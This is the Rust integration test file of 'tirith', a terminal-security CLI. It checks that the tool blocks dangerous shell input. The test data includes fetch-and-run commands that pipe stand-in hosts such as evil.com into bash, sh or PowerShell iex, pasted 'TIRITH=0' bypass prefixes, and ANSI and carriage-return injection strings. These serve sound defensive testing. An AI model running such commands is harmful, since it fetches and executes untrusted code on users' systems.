tirith 0.3.1

Terminal security - catches homograph attacks, pipe-to-shell, ANSI injection
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
1050
1051
1052
1053
1054
1055
1056
1057
1058
1059
1060
1061
1062
1063
1064
1065
1066
1067
1068
1069
1070
1071
1072
1073
1074
1075
1076
1077
1078
1079
1080
1081
1082
1083
1084
1085
1086
1087
1088
1089
1090
1091
1092
1093
1094
1095
1096
1097
1098
1099
1100
1101
1102
1103
1104
1105
1106
1107
1108
1109
1110
1111
1112
1113
1114
1115
1116
1117
1118
1119
1120
1121
1122
1123
1124
1125
1126
1127
1128
1129
1130
1131
1132
1133
1134
1135
1136
1137
1138
1139
1140
1141
1142
1143
1144
1145
1146
1147
1148
1149
1150
1151
1152
1153
1154
1155
1156
1157
1158
1159
1160
1161
1162
1163
1164
1165
1166
1167
1168
1169
1170
1171
1172
1173
1174
1175
1176
1177
1178
1179
1180
1181
1182
1183
1184
1185
1186
1187
1188
1189
1190
1191
1192
1193
1194
1195
1196
1197
1198
1199
1200
1201
1202
1203
1204
1205
1206
1207
1208
1209
1210
1211
1212
1213
1214
1215
1216
1217
1218
1219
1220
1221
1222
1223
1224
1225
1226
1227
1228
1229
1230
1231
1232
1233
1234
1235
1236
1237
1238
1239
1240
1241
1242
1243
1244
1245
1246
1247
1248
1249
1250
1251
1252
1253
1254
1255
1256
1257
1258
1259
1260
1261
1262
1263
1264
1265
1266
1267
1268
1269
1270
1271
1272
1273
1274
1275
1276
1277
1278
1279
1280
1281
1282
1283
1284
1285
1286
1287
1288
1289
1290
1291
1292
1293
1294
1295
1296
1297
1298
1299
1300
1301
1302
1303
1304
1305
1306
1307
1308
1309
1310
1311
1312
1313
1314
1315
1316
1317
1318
1319
1320
1321
1322
1323
1324
1325
1326
1327
1328
1329
1330
1331
1332
1333
1334
1335
1336
1337
1338
1339
1340
1341
1342
1343
1344
1345
1346
1347
1348
1349
1350
1351
1352
1353
1354
1355
1356
1357
1358
1359
1360
1361
1362
1363
1364
1365
1366
1367
1368
1369
1370
1371
1372
1373
1374
1375
1376
1377
1378
1379
1380
1381
1382
1383
1384
1385
1386
1387
1388
1389
1390
1391
1392
1393
1394
1395
1396
1397
1398
1399
1400
1401
1402
1403
1404
1405
1406
1407
1408
1409
1410
1411
1412
1413
1414
1415
1416
1417
1418
1419
1420
1421
1422
1423
1424
1425
1426
1427
1428
1429
1430
1431
1432
1433
1434
1435
1436
1437
1438
1439
1440
1441
1442
1443
1444
1445
1446
1447
1448
1449
1450
1451
1452
1453
1454
1455
1456
1457
1458
1459
1460
1461
1462
1463
1464
1465
1466
1467
1468
1469
1470
1471
1472
1473
1474
1475
1476
1477
1478
1479
1480
1481
1482
1483
1484
1485
1486
1487
1488
1489
1490
1491
1492
1493
1494
1495
1496
1497
1498
1499
1500
1501
1502
1503
1504
1505
1506
1507
1508
1509
1510
1511
1512
1513
1514
1515
1516
1517
1518
1519
1520
1521
1522
1523
1524
1525
1526
1527
1528
1529
1530
1531
1532
1533
1534
1535
1536
1537
1538
1539
1540
1541
1542
1543
1544
1545
1546
1547
1548
1549
1550
1551
1552
1553
1554
1555
1556
1557
1558
1559
1560
1561
1562
1563
1564
1565
1566
1567
1568
1569
1570
1571
1572
1573
1574
1575
1576
1577
1578
1579
1580
1581
1582
1583
1584
1585
1586
1587
1588
1589
1590
1591
1592
1593
1594
1595
1596
1597
1598
1599
1600
1601
1602
1603
1604
1605
1606
1607
1608
1609
1610
1611
1612
1613
1614
1615
1616
1617
1618
1619
1620
1621
1622
1623
1624
1625
1626
1627
1628
1629
1630
1631
1632
1633
1634
1635
1636
1637
1638
1639
1640
1641
1642
1643
1644
1645
1646
1647
1648
1649
1650
1651
1652
1653
1654
1655
1656
1657
1658
1659
1660
1661
1662
1663
1664
1665
1666
1667
1668
1669
1670
1671
1672
1673
1674
1675
1676
1677
1678
1679
1680
1681
1682
1683
1684
1685
1686
1687
1688
1689
1690
1691
1692
1693
1694
1695
1696
1697
1698
1699
1700
1701
1702
1703
1704
1705
1706
1707
1708
1709
1710
1711
1712
1713
1714
1715
1716
1717
1718
1719
1720
1721
1722
1723
1724
1725
1726
1727
1728
1729
1730
1731
1732
1733
1734
1735
1736
1737
1738
1739
1740
1741
1742
1743
1744
1745
1746
1747
1748
1749
1750
1751
1752
1753
1754
1755
1756
1757
1758
1759
1760
1761
1762
1763
1764
1765
1766
1767
1768
1769
1770
1771
1772
1773
1774
1775
1776
1777
1778
1779
1780
1781
1782
1783
1784
1785
1786
1787
1788
1789
1790
1791
1792
1793
1794
1795
1796
1797
1798
1799
1800
1801
1802
1803
1804
1805
1806
1807
1808
1809
1810
1811
1812
1813
1814
1815
1816
1817
1818
1819
1820
1821
1822
1823
1824
1825
1826
1827
1828
1829
1830
1831
1832
1833
1834
1835
1836
1837
1838
1839
1840
1841
1842
1843
1844
1845
1846
1847
1848
1849
1850
1851
1852
1853
1854
1855
1856
1857
1858
1859
//! Integration tests for the tirith CLI binary.
//! Tests exercise subcommands via process invocation.

use std::fs;
#[cfg(unix)]
use std::io::Write;
use std::path::PathBuf;
use std::process::Command;

fn tirith() -> Command {
    let mut cmd = Command::new(env!("CARGO_BIN_EXE_tirith"));
    cmd.env_remove("TIRITH");
    cmd
}

#[test]
fn check_clean_command_allows() {
    let out = tirith()
        .args(["check", "--shell", "posix", "--", "ls -la"])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(0), "clean command should exit 0");
}

#[test]
fn check_curl_pipe_bash_blocks() {
    let out = tirith()
        .args([
            "check",
            "--shell",
            "posix",
            "--",
            "curl https://example.com/install.sh | bash",
        ])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(1), "curl pipe bash should exit 1");
}

#[test]
fn check_curl_pipe_bash_shows_remediation_hint() {
    let out = tirith()
        .args([
            "check",
            "--shell",
            "posix",
            "--non-interactive",
            "--",
            "curl https://example.com/install.sh | bash",
        ])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(1));
    let stderr = String::from_utf8_lossy(&out.stderr);
    assert!(
        stderr.contains("getvet.sh"),
        "human output should contain vet hint: {stderr}"
    );
}

#[test]
fn check_iwr_pipe_iex_no_tirith_run_hint() {
    let out = tirith()
        .args([
            "check",
            "--shell",
            "powershell",
            "--non-interactive",
            "--",
            "iwr https://evil.com/script.ps1 | iex",
        ])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(1));
    let stderr = String::from_utf8_lossy(&out.stderr);
    assert!(
        stderr.contains("getvet.sh"),
        "PowerShell fetch should show vet hint: {stderr}"
    );
    assert!(
        !stderr.contains("tirith run"),
        "PowerShell fetch should NOT suggest tirith run: {stderr}"
    );
}

#[test]
fn check_http_to_sink_blocks() {
    let out = tirith()
        .args([
            "check",
            "--shell",
            "posix",
            "--",
            "curl http://evil.com/payload",
        ])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(1), "http to sink should exit 1");
}

#[test]
fn check_shortened_url_warns() {
    let out = tirith()
        .args([
            "check",
            "--shell",
            "posix",
            "--",
            "curl https://bit.ly/abc123",
        ])
        .output()
        .expect("failed to run tirith");
    assert_eq!(
        out.status.code(),
        Some(2),
        "shortened URL should exit 2 (warn)"
    );
}

#[test]
fn check_json_output() {
    let out = tirith()
        .args([
            "check",
            "--shell",
            "posix",
            "--json",
            "--",
            "curl https://example.com/install.sh | bash",
        ])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(1));
    let stdout = String::from_utf8_lossy(&out.stdout);
    let json: serde_json::Value =
        serde_json::from_str(&stdout).expect("output should be valid JSON");
    assert_eq!(json["schema_version"], 3);
    assert_eq!(json["action"], "block");
    assert!(!json["findings"].as_array().unwrap().is_empty());
}

#[test]
fn check_json_output_redacts_assignment_values_in_findings() {
    let out = tirith()
        .args([
            "check",
            "--shell",
            "posix",
            "--interactive",
            "--json",
            "--",
            "OPENAI_API_KEY=sk-secret curl https://evil.com | sh",
        ])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(1));
    let stdout = String::from_utf8_lossy(&out.stdout);
    assert!(
        !stdout.contains("sk-secret"),
        "JSON output should not contain raw secret values: {stdout}"
    );
    assert!(
        stdout.contains("OPENAI_API_KEY=[REDACTED]"),
        "JSON output should scrub assignment values: {stdout}"
    );
}

#[test]
fn check_json_clean_output() {
    let out = tirith()
        .args(["check", "--shell", "posix", "--json", "--", "echo hello"])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(0));
    let stdout = String::from_utf8_lossy(&out.stdout);
    let json: serde_json::Value =
        serde_json::from_str(&stdout).expect("output should be valid JSON");
    assert_eq!(json["schema_version"], 3);
    assert_eq!(json["action"], "allow");
}

#[test]
fn check_powershell_iwr_iex_blocks() {
    let out = tirith()
        .args([
            "check",
            "--shell",
            "powershell",
            "--",
            "iwr https://evil.com/script.ps1 | iex",
        ])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(1), "iwr | iex should exit 1");
}

#[test]
fn check_powershell_invoke_expression_blocks() {
    let out = tirith()
        .args([
            "check",
            "--shell",
            "powershell",
            "--",
            "Invoke-WebRequest https://evil.com/script.ps1 | Invoke-Expression",
        ])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(1));
}

#[test]
fn paste_clean_text_allows() {
    let out = tirith()
        .args(["paste", "--shell", "posix"])
        .stdin(std::process::Stdio::piped())
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(0));
}

#[test]
fn paste_ansi_escape_blocks() {
    use std::io::Write;
    let mut child = tirith()
        .args(["paste", "--shell", "posix"])
        .stdin(std::process::Stdio::piped())
        .stdout(std::process::Stdio::piped())
        .stderr(std::process::Stdio::piped())
        .spawn()
        .expect("failed to spawn tirith");

    child
        .stdin
        .take()
        .unwrap()
        .write_all(b"hello \x1b[31mred\x1b[0m world")
        .unwrap();

    let out = child.wait_with_output().unwrap();
    assert_eq!(
        out.status.code(),
        Some(1),
        "paste with ANSI escapes should block"
    );
}

#[test]
fn paste_inline_bypass_requires_interactive_mode() {
    use std::io::Write;
    let mut child = tirith()
        .args(["paste", "--shell", "posix"])
        .stdin(std::process::Stdio::piped())
        .spawn()
        .expect("failed to spawn tirith");

    child
        .stdin
        .take()
        .unwrap()
        .write_all(b"TIRITH=0 curl -LsSf https://example.com/install.sh | sh")
        .unwrap();

    let out = child.wait_with_output().unwrap();
    assert_eq!(
        out.status.code(),
        Some(1),
        "non-interactive paste should not honor bypass by default"
    );
}

#[test]
fn paste_inline_bypass_not_honored_with_interactive_flag() {
    use std::io::Write;
    let mut child = tirith()
        .args(["paste", "--shell", "posix", "--interactive"])
        .stdin(std::process::Stdio::piped())
        .spawn()
        .expect("failed to spawn tirith");

    child
        .stdin
        .take()
        .unwrap()
        .write_all(b"TIRITH=0 curl -LsSf https://example.com/install.sh | sh")
        .unwrap();

    let out = child.wait_with_output().unwrap();
    assert_eq!(
        out.status.code(),
        Some(1),
        "interactive paste should not honor pasted TIRITH=0 prefixes"
    );
}

#[test]
fn paste_env_wrapper_bypass_not_honored_with_interactive_flag() {
    use std::io::Write;
    let mut child = tirith()
        .args(["paste", "--shell", "posix", "--interactive"])
        .stdin(std::process::Stdio::piped())
        .spawn()
        .expect("failed to spawn tirith");

    child
        .stdin
        .take()
        .unwrap()
        .write_all(b"env TIRITH=0 curl -LsSf https://example.com/install.sh | sh")
        .unwrap();

    let out = child.wait_with_output().unwrap();
    assert_eq!(
        out.status.code(),
        Some(1),
        "interactive paste should not honor pasted env TIRITH=0 prefixes"
    );
}

#[test]
fn paste_process_level_bypass_still_honored_with_interactive_flag() {
    use std::io::Write;
    let mut child = tirith()
        .env("TIRITH", "0")
        .args(["paste", "--shell", "posix", "--interactive"])
        .stdin(std::process::Stdio::piped())
        .spawn()
        .expect("failed to spawn tirith");

    child
        .stdin
        .take()
        .unwrap()
        .write_all(b"curl -LsSf https://example.com/install.sh | sh")
        .unwrap();

    let out = child.wait_with_output().unwrap();
    assert_eq!(
        out.status.code(),
        Some(0),
        "interactive paste should still honor process-level TIRITH=0 bypass"
    );
}

#[test]
fn score_clean_url() {
    let out = tirith()
        .args(["score", "https://example.com/page"])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(0));
}

#[test]
fn score_suspicious_url() {
    let out = tirith()
        .args(["score", "https://bit.ly/abc123"])
        .output()
        .expect("failed to run tirith");
    // `score` always exits 0 even when findings are reported.
    assert_eq!(out.status.code(), Some(0));
}

#[test]
fn score_json_output() {
    let out = tirith()
        .args(["score", "--json", "https://bit.ly/abc123"])
        .output()
        .expect("failed to run tirith");
    let stdout = String::from_utf8_lossy(&out.stdout);
    let json: serde_json::Value =
        serde_json::from_str(&stdout).expect("score --json should output valid JSON");
    assert!(json.get("findings").is_some());
}

#[test]
fn why_no_trigger() {
    let out = tirith()
        .args(["why"])
        .output()
        .expect("failed to run tirith");
    // Exits 1 when no last_trigger.json exists — treat that as success here.
    assert!(
        out.status.code() == Some(0) || out.status.code() == Some(1),
        "why should exit 0 or 1"
    );
}

#[test]
fn check_last_trigger_redacts_assignment_values_in_findings() {
    let dir = tempfile::tempdir().expect("tempdir");
    let out = tirith()
        .env("XDG_DATA_HOME", dir.path())
        .env("APPDATA", dir.path())
        .args([
            "check",
            "--shell",
            "posix",
            "--interactive",
            "--",
            "OPENAI_API_KEY=sk-secret curl https://evil.com | sh",
        ])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(1));

    let last_trigger_path = dir.path().join("tirith").join("last_trigger.json");
    let contents =
        fs::read_to_string(&last_trigger_path).expect("last_trigger.json should be written");
    assert!(
        !contents.contains("sk-secret"),
        "last_trigger.json should not contain raw secret values: {contents}"
    );
    assert!(
        contents.contains("OPENAI_API_KEY=[REDACTED]"),
        "last_trigger.json should scrub assignment values: {contents}"
    );
}

#[test]
fn check_wrapped_tirith_run_preserves_sink_rules() {
    for command in [
        "env tirith run http://example.com",
        "command tirith run http://example.com",
        "time tirith run http://example.com",
    ] {
        let out = tirith()
            .args(["check", "--shell", "posix", "--", command])
            .output()
            .expect("failed to run tirith");
        assert_eq!(
            out.status.code(),
            Some(1),
            "wrapped tirith run should trigger sink rules: {command}"
        );
    }
}

#[test]
fn init_zsh_output() {
    let out = tirith()
        .args(["init", "--shell", "zsh"])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(0));
    let stdout = String::from_utf8_lossy(&out.stdout);
    assert!(
        stdout.contains("zsh-hook.zsh") || stdout.contains("source"),
        "init --shell zsh should reference zsh hook"
    );
}

#[test]
fn init_bash_output() {
    let out = tirith()
        .args(["init", "--shell", "bash"])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(0));
    let stdout = String::from_utf8_lossy(&out.stdout);
    assert!(
        stdout.contains("bash-hook.bash"),
        "init --shell bash should reference bash hook"
    );
    assert!(
        !stdout.contains("export TIRITH_BASH_MODE=enter"),
        "init --shell bash should not override user-provided TIRITH_BASH_MODE"
    );
}

#[test]
fn init_unsupported_shell() {
    let out = tirith()
        .args(["init", "--shell", "tcsh"])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(1));
}

#[cfg(unix)]
#[test]
fn bash_hook_defaults_to_preexec_in_ssh_sessions() {
    let hook = format!(
        "{}/assets/shell/lib/bash-hook.bash",
        env!("CARGO_MANIFEST_DIR")
    );
    let script = format!(
        "unset TIRITH_BASH_MODE; export SSH_CONNECTION=1; source '{hook}'; printf '%s' \"$_TIRITH_BASH_MODE\""
    );
    let out = Command::new("bash")
        .args(["--norc", "--noprofile", "-c", &script])
        .env_remove("_TIRITH_BASH_LOADED")
        .output()
        .expect("failed to run bash");
    assert_eq!(out.status.code(), Some(0));
    let stdout = String::from_utf8_lossy(&out.stdout);
    assert_eq!(
        stdout, "preexec",
        "SSH sessions should default to preexec mode"
    );
}

#[cfg(unix)]
#[test]
fn bash_hook_respects_explicit_mode_override_in_ssh_sessions() {
    let hook = format!(
        "{}/assets/shell/lib/bash-hook.bash",
        env!("CARGO_MANIFEST_DIR")
    );
    let script = format!(
        "export TIRITH_BASH_MODE=enter; export SSH_CONNECTION=1; source '{hook}'; printf '%s' \"$_TIRITH_BASH_MODE\""
    );
    let out = Command::new("bash")
        .args(["--norc", "--noprofile", "-c", &script])
        .env_remove("_TIRITH_BASH_LOADED")
        .output()
        .expect("failed to run bash");
    assert_eq!(out.status.code(), Some(0));
    let stdout = String::from_utf8_lossy(&out.stdout);
    assert_eq!(
        stdout, "enter",
        "explicit TIRITH_BASH_MODE should take precedence"
    );
}

#[test]
fn embedded_shell_hooks_match_repo_hooks() {
    let manifest_dir = PathBuf::from(env!("CARGO_MANIFEST_DIR"));
    let embedded_dir = manifest_dir.join("assets/shell/lib");
    let repo_dir = manifest_dir.join("../../shell/lib");

    if !repo_dir.exists() {
        // Skip when running outside the workspace (e.g. a crate-only
        // package test where shell/lib is not present).
        return;
    }

    for hook in [
        "zsh-hook.zsh",
        "bash-hook.bash",
        "fish-hook.fish",
        "powershell-hook.ps1",
        "nushell-hook.nu",
    ] {
        let embedded = fs::read_to_string(embedded_dir.join(hook))
            .unwrap_or_else(|e| panic!("failed reading embedded hook {hook}: {e}"));
        let repo = fs::read_to_string(repo_dir.join(hook))
            .unwrap_or_else(|e| panic!("failed reading repo hook {hook}: {e}"));
        assert_eq!(
            embedded, repo,
            "embedded hook {hook} must stay in sync with shell/lib/{hook}"
        );
    }
}

#[test]
fn tier1_exit_fast_for_ls() {
    let out = tirith()
        .args(["check", "--json", "--shell", "posix", "--", "ls -la /tmp"])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(0));
    let stdout = String::from_utf8_lossy(&out.stdout);
    let json: serde_json::Value = serde_json::from_str(&stdout).unwrap();
    assert_eq!(json["tier_reached"], 1, "ls should exit at Tier 1");
}

#[test]
fn tier3_reached_for_curl() {
    let out = tirith()
        .args([
            "check",
            "--json",
            "--shell",
            "posix",
            "--",
            "curl https://example.com/install.sh | bash",
        ])
        .output()
        .expect("failed to run tirith");
    let stdout = String::from_utf8_lossy(&out.stdout);
    let json: serde_json::Value = serde_json::from_str(&stdout).unwrap();
    assert_eq!(
        json["tier_reached"], 3,
        "curl pipe bash should reach Tier 3"
    );
}

#[test]
fn bypass_in_interactive_mode() {
    let out = tirith()
        .env("TIRITH", "0")
        .args([
            "check",
            "--json",
            "--shell",
            "posix",
            "--",
            "curl https://example.com/install.sh | bash",
        ])
        .output()
        .expect("failed to run tirith");
    let stdout = String::from_utf8_lossy(&out.stdout);
    let json: serde_json::Value = serde_json::from_str(&stdout).unwrap();
    // Whether the bypass is honored depends on policy; assert only that
    // the request was recorded in the envelope.
    assert!(json.get("bypass_requested").is_some());
}

#[test]
fn json_includes_observability() {
    let out = tirith()
        .args([
            "check",
            "--json",
            "--shell",
            "posix",
            "--",
            "curl https://example.com/install.sh | bash",
        ])
        .output()
        .expect("failed to run tirith");
    let stdout = String::from_utf8_lossy(&out.stdout);
    let json: serde_json::Value = serde_json::from_str(&stdout).unwrap();
    assert!(json.get("timings_ms").is_some());
    assert!(json.get("tier_reached").is_some());
    assert!(json.get("urls_extracted_count").is_some());
}

#[test]
fn diff_url() {
    let out = tirith()
        .args(["diff", "https://example.com/page"])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(0));
}

#[test]
fn receipt_list_empty() {
    let out = tirith()
        .args(["receipt", "list"])
        .output()
        .expect("failed to run tirith");
    assert!(
        out.status.code() == Some(0) || out.status.code() == Some(1),
        "receipt list should work"
    );
}

#[cfg(unix)]
#[test]
fn paste_trailing_cr_allows() {
    let mut child = Command::new(env!("CARGO_BIN_EXE_tirith"))
        .args(["paste", "--shell", "posix"])
        .stdin(std::process::Stdio::piped())
        .stdout(std::process::Stdio::piped())
        .stderr(std::process::Stdio::piped())
        .spawn()
        .expect("failed to spawn tirith");
    child
        .stdin
        .as_mut()
        .unwrap()
        .write_all(b"/some/path\r")
        .unwrap();
    let out = child.wait_with_output().unwrap();
    assert_eq!(
        out.status.code(),
        Some(0),
        "trailing \\r should not trigger control_chars block"
    );
}

#[cfg(unix)]
#[test]
fn paste_embedded_cr_blocks() {
    let mut child = Command::new(env!("CARGO_BIN_EXE_tirith"))
        .args(["paste", "--shell", "posix"])
        .stdin(std::process::Stdio::piped())
        .stdout(std::process::Stdio::piped())
        .stderr(std::process::Stdio::piped())
        .spawn()
        .expect("failed to spawn tirith");
    child
        .stdin
        .as_mut()
        .unwrap()
        .write_all(b"safe\rmalicious")
        .unwrap();
    let out = child.wait_with_output().unwrap();
    assert_eq!(
        out.status.code(),
        Some(1),
        "embedded \\r before non-\\n should trigger block"
    );
}

#[cfg(unix)]
#[test]
fn paste_windows_crlf_allows() {
    let mut child = Command::new(env!("CARGO_BIN_EXE_tirith"))
        .args(["paste", "--shell", "posix"])
        .stdin(std::process::Stdio::piped())
        .stdout(std::process::Stdio::piped())
        .stderr(std::process::Stdio::piped())
        .spawn()
        .expect("failed to spawn tirith");
    child
        .stdin
        .as_mut()
        .unwrap()
        .write_all(b"echo hello\r\necho world\r\n")
        .unwrap();
    let out = child.wait_with_output().unwrap();
    assert_eq!(
        out.status.code(),
        Some(0),
        "Windows \\r\\n line endings should not trigger block"
    );
}

#[cfg(unix)]
#[test]
fn bash_hook_enter_default_outside_ssh() {
    let tmpdir = tempfile::tempdir().expect("failed to create tmpdir");
    let hook = format!(
        "{}/assets/shell/lib/bash-hook.bash",
        env!("CARGO_MANIFEST_DIR")
    );
    let script = format!(
        "unset TIRITH_BASH_MODE; unset SSH_CONNECTION; unset SSH_TTY; unset SSH_CLIENT; source '{hook}'; printf '%s' \"$_TIRITH_BASH_MODE\""
    );
    let out = Command::new("bash")
        .args(["--norc", "--noprofile", "-c", &script])
        .env("XDG_STATE_HOME", tmpdir.path())
        .env_remove("_TIRITH_BASH_LOADED")
        .output()
        .expect("failed to run bash");
    assert_eq!(out.status.code(), Some(0));
    let stdout = String::from_utf8_lossy(&out.stdout);
    assert_eq!(
        stdout, "enter",
        "non-SSH sessions should default to enter mode"
    );
}

#[cfg(unix)]
#[test]
fn bash_hook_honors_persistent_safe_mode() {
    let tmpdir = tempfile::tempdir().expect("failed to create tmpdir");
    let state_dir = tmpdir.path().join("tirith");
    fs::create_dir_all(&state_dir).unwrap();
    fs::write(state_dir.join("bash-safe-mode"), "1\n").unwrap();

    let hook = format!(
        "{}/assets/shell/lib/bash-hook.bash",
        env!("CARGO_MANIFEST_DIR")
    );
    let script = format!(
        "unset TIRITH_BASH_MODE; unset SSH_CONNECTION; unset SSH_TTY; unset SSH_CLIENT; source '{hook}'; printf '%s' \"$_TIRITH_BASH_MODE\""
    );
    let out = Command::new("bash")
        .args(["--norc", "--noprofile", "-c", &script])
        .env("XDG_STATE_HOME", tmpdir.path())
        .env_remove("_TIRITH_BASH_LOADED")
        .output()
        .expect("failed to run bash");
    assert_eq!(out.status.code(), Some(0));
    let stdout = String::from_utf8_lossy(&out.stdout);
    assert_eq!(
        stdout, "preexec",
        "persistent safe-mode flag should force preexec"
    );
}

#[cfg(unix)]
#[test]
fn bash_hook_explicit_override_trumps_safe_mode() {
    let tmpdir = tempfile::tempdir().expect("failed to create tmpdir");
    let state_dir = tmpdir.path().join("tirith");
    fs::create_dir_all(&state_dir).unwrap();
    fs::write(state_dir.join("bash-safe-mode"), "1\n").unwrap();

    let hook = format!(
        "{}/assets/shell/lib/bash-hook.bash",
        env!("CARGO_MANIFEST_DIR")
    );
    let script = format!(
        "export TIRITH_BASH_MODE=enter; source '{hook}'; printf '%s' \"$_TIRITH_BASH_MODE\""
    );
    let out = Command::new("bash")
        .args(["--norc", "--noprofile", "-c", &script])
        .env("XDG_STATE_HOME", tmpdir.path())
        .env_remove("_TIRITH_BASH_LOADED")
        .output()
        .expect("failed to run bash");
    assert_eq!(out.status.code(), Some(0));
    let stdout = String::from_utf8_lossy(&out.stdout);
    assert_eq!(
        stdout, "enter",
        "explicit TIRITH_BASH_MODE should override safe-mode flag"
    );
}

#[cfg(unix)]
#[test]
fn bash_hook_prompt_hook_reattaches() {
    let hook = format!(
        "{}/assets/shell/lib/bash-hook.bash",
        env!("CARGO_MANIFEST_DIR")
    );
    // Source the hook, overwrite PROMPT_COMMAND, call the ensure helper,
    // and verify it re-attached.
    let script = format!(
        "source '{hook}'; PROMPT_COMMAND='other_fn'; _tirith_ensure_prompt_hook; [[ \"$PROMPT_COMMAND\" == *_tirith_prompt_hook* ]] && printf 'reattached' || printf 'missing'"
    );
    let out = Command::new("bash")
        .args(["--norc", "--noprofile", "-c", &script])
        .env_remove("_TIRITH_BASH_LOADED")
        .output()
        .expect("failed to run bash");
    assert_eq!(out.status.code(), Some(0));
    let stdout = String::from_utf8_lossy(&out.stdout);
    assert_eq!(
        stdout, "reattached",
        "_tirith_ensure_prompt_hook should reattach when overwritten"
    );
}

#[cfg(unix)]
fn expect_available() -> bool {
    Command::new("sh")
        .args(["-c", "command -v expect >/dev/null 2>&1"])
        .status()
        .map(|s| s.success())
        .unwrap_or(false)
}

#[cfg(unix)]
fn bash_major_version() -> Option<u32> {
    let out = Command::new("bash").arg("--version").output().ok()?;
    if !out.status.success() {
        return None;
    }
    let first = String::from_utf8_lossy(&out.stdout)
        .lines()
        .next()
        .unwrap_or_default()
        .to_string();
    let marker = "version ";
    let idx = first.find(marker)?;
